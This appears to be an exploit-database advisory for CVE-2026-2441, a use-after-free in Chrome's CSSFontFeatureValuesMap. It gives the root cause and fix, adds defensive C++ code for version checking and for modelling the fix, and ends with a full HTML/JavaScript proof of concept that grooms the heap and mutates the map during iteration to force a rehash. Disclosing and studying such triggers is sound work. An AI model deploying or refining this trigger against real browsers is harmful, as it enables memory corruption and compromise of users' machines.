Google Chrome CSSFontFeatureValuesMap Use-After-Free

23 Feb 2026 | Reported by nu11secur1ty | Source: packetstorm (packetstorm.news)

Chrome before 145.0.7632.75 had a use-after-free in CSSFontFeatureValuesMap during iteration.

# Exploit Title: Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free
# Date: 2026-02-23
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.google.com/chrome/
# Software Link: https://www.google.com/chrome/
# Version: Chrome <= 144.x | Chrome < 145.0.7632.75
# Tested on: Windows 11 / Linux / macOS
# CVE: CVE-2026-2441
# Exploit Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441

## Description
A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink)
within the CSSFontFeatureValuesMap implementation. When an iterator is
created over a CSSFontFeatureValuesMap object and the underlying HashMap is
mutated during iteration, a rehash operation occurs, freeing the original
memory while the iterator still holds a raw pointer to it. This leads to a
use-after-free condition that can be exploited to execute arbitrary code
inside the Chrome sandbox.

The vulnerability was actively exploited in the wild as a zero-day before
the patch was released.

## Vulnerable Versions
- Google Chrome <= 144.x
- Google Chrome < 145.0.7632.75
- Microsoft Edge (prior to Chromium 145 update)
- Opera (prior to 127.0.5778.64)
- Any Chromium-based browser using affected Blink versions
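A small version-comparison helper for checking an inventory of installed browsers against the fixed builds listed above. This is an added example, not part of the advisory or the exploit repository; the fixed version strings are the ones the list states, every other version string used below is a constructed sample, and the function names are illustrative.

```cpp
// Added helper, not part of the advisory: decide whether an installed
// Chrome or Opera build is older than the fixed builds named above.
#include <cctype>
#include <string>
#include <vector>

// Fixed builds as stated in the advisory's "Vulnerable Versions" list.
const char* const kChromeFixed = "145.0.7632.75";
const char* const kOperaFixed = "127.0.5778.64";

// Split "a.b.c.d" into numeric components. Parsing stops at the first
// character that is neither a digit nor '.', so a suffix such as
// " (Official Build)" is ignored; missing components count as 0, so a bare
// "144" compares as 144.0.0.0.
std::vector<long> ParseVersion(const std::string& v) {
  std::vector<long> parts;
  long current = 0;
  bool in_number = false;
  for (char c : v) {
    if (std::isdigit(static_cast<unsigned char>(c))) {
      current = current * 10 + (c - '0');
      in_number = true;
    } else if (c == '.') {
      parts.push_back(in_number ? current : 0);
      current = 0;
      in_number = false;
    } else {
      break;
    }
  }
  parts.push_back(in_number ? current : 0);
  while (parts.size() < 4) parts.push_back(0);
  return parts;
}

// True when `installed` is strictly older than `fixed`; std::vector's
// operator< gives the component-wise (lexicographic) comparison we want.
bool IsOlderThan(const std::string& installed, const std::string& fixed) {
  return ParseVersion(installed) < ParseVersion(fixed);
}

bool ChromeVulnerable(const std::string& installed) {
  return IsOlderThan(installed, kChromeFixed);
}

bool OperaVulnerable(const std::string& installed) {
  return IsOlderThan(installed, kOperaFixed);
}
```

Edge and other Chromium derivatives carry their own version numbering, so for those the list's "prior to Chromium 145 update" wording has to be checked against the embedded Chromium version rather than the product version.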

## Technical Details
**Root Cause:** In `third_party/blink/renderer/core/css/css_font_feature_values_map.cc`,
the `FontFeatureValuesMapIterationSource` holds a raw pointer
(`const FontFeatureAliases* aliases_`) to the internal HashMap. When the map is
mutated via `set()` or `delete()` during iteration, the HashMap rehashes,
the old storage is freed, and the pointer becomes dangling.

**Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw
pointer with a deep copy (`const FontFeatureAliases aliases_`).
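To make the root cause and the fix concrete outside Blink, here is an added model of the two iteration-source shapes using `std::unordered_map` in place of `WTF::HashMap` (both invalidate iterators on rehash). It is illustrative code written for this page, not Chromium's; the class names `RawPointerIterationSource` and `SnapshotIterationSource`, the helpers, and the 15-entry sample map (taken from the PoC's `Target` styleset) are all constructed here. The pre-fix shape is never dereferenced after a mutation; the model only detects the rehash that would make its stored iterator dangle, while the post-fix shape replays the PoC's delete-then-spray loop and shows the snapshot still yields every original entry.

```cpp
// Added illustration, not Chromium code: the raw-pointer iteration source
// versus the deep-copy fix, modelled on std::unordered_map.
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <string>
#include <unordered_map>
#include <vector>

using FontFeatureAliases =
    std::unordered_map<std::string, std::vector<uint32_t>>;

// Pre-fix shape: a raw pointer to the live map plus an iterator into it.
// A rehash triggered by set()/delete() frees the old bucket storage, so it_
// would dangle. We never dereference it_ after a mutation here; Invalidated()
// only reports the condition (bucket count changed) that makes it invalid.
class RawPointerIterationSource {
 public:
  explicit RawPointerIterationSource(const FontFeatureAliases* aliases)
      : aliases_(aliases),
        buckets_at_start_(aliases->bucket_count()),
        it_(aliases->cbegin()) {}

  bool Invalidated() const {
    return aliases_->bucket_count() != buckets_at_start_;
  }

 private:
  const FontFeatureAliases* aliases_;
  std::size_t buckets_at_start_;
  FontFeatureAliases::const_iterator it_;
};

// Post-fix shape: the source owns a deep copy taken at creation, so later
// mutation of the live map cannot touch the storage being iterated.
class SnapshotIterationSource {
 public:
  explicit SnapshotIterationSource(const FontFeatureAliases& aliases)
      : aliases_(aliases), it_(aliases_.cbegin()) {}
  SnapshotIterationSource(const SnapshotIterationSource&) = delete;
  SnapshotIterationSource& operator=(const SnapshotIterationSource&) = delete;

  bool Next(std::string* key, std::vector<uint32_t>* value) {
    if (it_ == aliases_.cend()) return false;
    *key = it_->first;
    *value = it_->second;
    ++it_;
    return true;
  }

 private:
  const FontFeatureAliases aliases_;  // owned copy; declared before it_
  FontFeatureAliases::const_iterator it_;
};

// Constructed sample: the 15 aliases a:1 .. o:15 from the PoC's @styleset.
FontFeatureAliases MakeTargetStyleset() {
  FontFeatureAliases m;
  const std::string names = "abcdefghijklmno";
  for (std::size_t i = 0; i < names.size(); ++i)
    m[std::string(1, names[i])] = {static_cast<uint32_t>(i + 1)};
  return m;
}

// The PoC's "massive insert": enough entries to force a rehash.
void SprayEntries(FontFeatureAliases& live, int step, int count) {
  for (int i = 0; i < count; ++i)
    live["spray_" + std::to_string(step) + "_" + std::to_string(i)] = {
        static_cast<uint32_t>(i)};
}

// Pre-fix shape: one spray is enough to invalidate the stored iterator.
bool RawPointerIteratorInvalidatedByRehash() {
  FontFeatureAliases live = MakeTargetStyleset();
  RawPointerIterationSource source(&live);
  SprayEntries(live, 0, 512);
  return source.Invalidated();
}

// Post-fix shape: replay the PoC loop (delete current key, spray 512) and
// count how many of the original entries the snapshot still yields.
std::size_t SnapshotEntriesYieldedUnderMutation() {
  FontFeatureAliases live = MakeTargetStyleset();
  SnapshotIterationSource source(live);
  std::size_t yielded = 0;
  std::string key;
  std::vector<uint32_t> value;
  for (int step = 0; source.Next(&key, &value); ++step) {
    ++yielded;
    live.erase(key);
    SprayEntries(live, step, 512);
  }
  return yielded;
}

int main() {
  std::cout << "raw-pointer source invalidated by rehash: "
            << (RawPointerIteratorInvalidatedByRehash() ? "yes" : "no") << '\n'
            << "snapshot source yielded " << SnapshotEntriesYieldedUnderMutation()
            << " of 15 entries under mutation\n";
  return 0;
}
```

The design point the fix relies on is visible in `SnapshotIterationSource`: the copy costs memory proportional to the map, but it removes the lifetime dependency between the iterator and a container that script can mutate at any time between `next()` calls. Copy construction of the source itself is deleted because its iterator points into its own member.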

## CVSS Score
**8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of Concept

```html
<!DOCTYPE html>
<!--
  CVE-2026-2441 - CSSFontFeatureValuesMap UAF
  Author: nu11secur1ty
  Date: 2026-02-23
  Repository:
-->

<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="author" content="nu11secur1ty">
  <title>CVE-2026-2441 PoC - nu11secur1ty</title>
  <style id="target-style">
    @font-feature-values Target {
      @styleset {
        a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8;
        i:9; j:10; k:11; l:12; m:13; n:14; o:15;
      }
    }
  </style>
  <style id="groom-style"></style>
</head>
<body>
  <h2>CVE-2026-2441 Proof of Concept</h2>
  <p>Author: nu11secur1ty</p>
  <p>Check browser console for output. If browser crashes -> VULNERABLE</p>

  <script>
    // =================================================================
    // CVE-2026-2441 Use-After-Free Exploit
    // Author: nu11secur1ty
    // =================================================================

    console.log("==========================================");
    console.log("CVE-2026-2441 PoC - nu11secur1ty");
    console.log("==========================================");

    // Heap grooming - create stable heap state
    function groomHeap(count) {
      let style = document.getElementById('groom-style');
      if (!style || !style.sheet) return [];

      // Clear existing
      while (style.sheet.cssRules.length) {
        try { style.sheet.deleteRule(0); } catch(e) {}
      }

      // Create groom objects
      for (let i = 0; i < count; i++) {
        try {
          style.sheet.insertRule(
            `@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`,
            style.sheet.cssRules.length
          );
        } catch(e) {}
      }

      console.log("[+] Heap groomed with " + count + " objects");
      return Array(count);
    }

    // Main exploit logic
    try {
      // Phase 1: Prepare heap
      groomHeap(64);

      // Phase 2: Get target map
      let sheet = document.getElementById('target-style').sheet;
      if (!sheet || !sheet.cssRules.length) {
        throw new Error("Target CSS rule not found");
      }

      let rule = sheet.cssRules[0];
      let map = rule.styleset;

      console.log("[+] CSSFontFeatureValuesMap size: " + map.size);

      // Phase 3: Create iterator - RAW POINTER CAPTURED HERE
      console.log("[*] Creating iterator (raw pointer captured)");
      let iterator = map.entries();
      let step = 0;
      let iterations = 0;

      // Phase 4: Trigger UAF through mutation + rehash
      console.log("[*] Triggering rehash + UAF...");

      while (step < 10) {
        let result = iterator.next();
        if (result.done) break;

        let [key, value] = result.value;
        iterations++;
        console.log("  [step " + step + "] Read: " + key + " = " + value);

        // MUTATION: delete current key
        map.delete(key);

        // MUTATION: massive insert to force rehash
        for (let i = 0; i < 512; i++) {
          map.set("spray_" + step + "_" + i, [i, i+1, i+2]);
        }

        step++;
      }

      console.log("[*] Completed " + iterations + " iterations");

      // Phase 5: Final check
      console.log("[*] Exploit execution complete");
      console.log("[*] If browser crashed: VULNERABLE");
      console.log("[*] If page survived: PATCHED");
      console.log("==========================================");
      console.log("CVE-2026-2441 - nu11secur1ty");
      console.log("Repository: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441");
      console.log("==========================================");

    } catch (e) {
      console.log("[!] EXCEPTION: " + e.message);
      console.log("[!] This indicates UAF was triggered");
      console.log("[!] CVE-2026-2441 - nu11secur1ty");
    }

    // Force layout recalc as additional trigger
    void document.body.offsetWidth;

  </script>

  <!-- Alternative for...of trigger -->
  <script>
    try {
      let altStyle = document.createElement('style');
      document.head.appendChild(altStyle);
      altStyle.sheet.insertRule(
        '@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0
      );
      let altMap = altStyle.sheet.cssRules[0].styleset;

      for (let [k, v] of altMap) {
        altMap.delete(k);
        for (let i = 0; i < 256; i++) {
          altMap.set("alt_" + i, [i]);
        }
        break;
      }
    } catch(e) {
      console.log("[!] Alternative trigger exception: " + e.message);
    }
  </script>
</body>
</html>
```

# Demo:
[href](https://www.patreon.com/posts/cve-2026-2441-151454779)


Scores (as of 23 Feb 2026):
- Vulners AI Score: 6.3 (Medium risk)
- CVSS 3.1: 8.8
- EPSS: 0.23127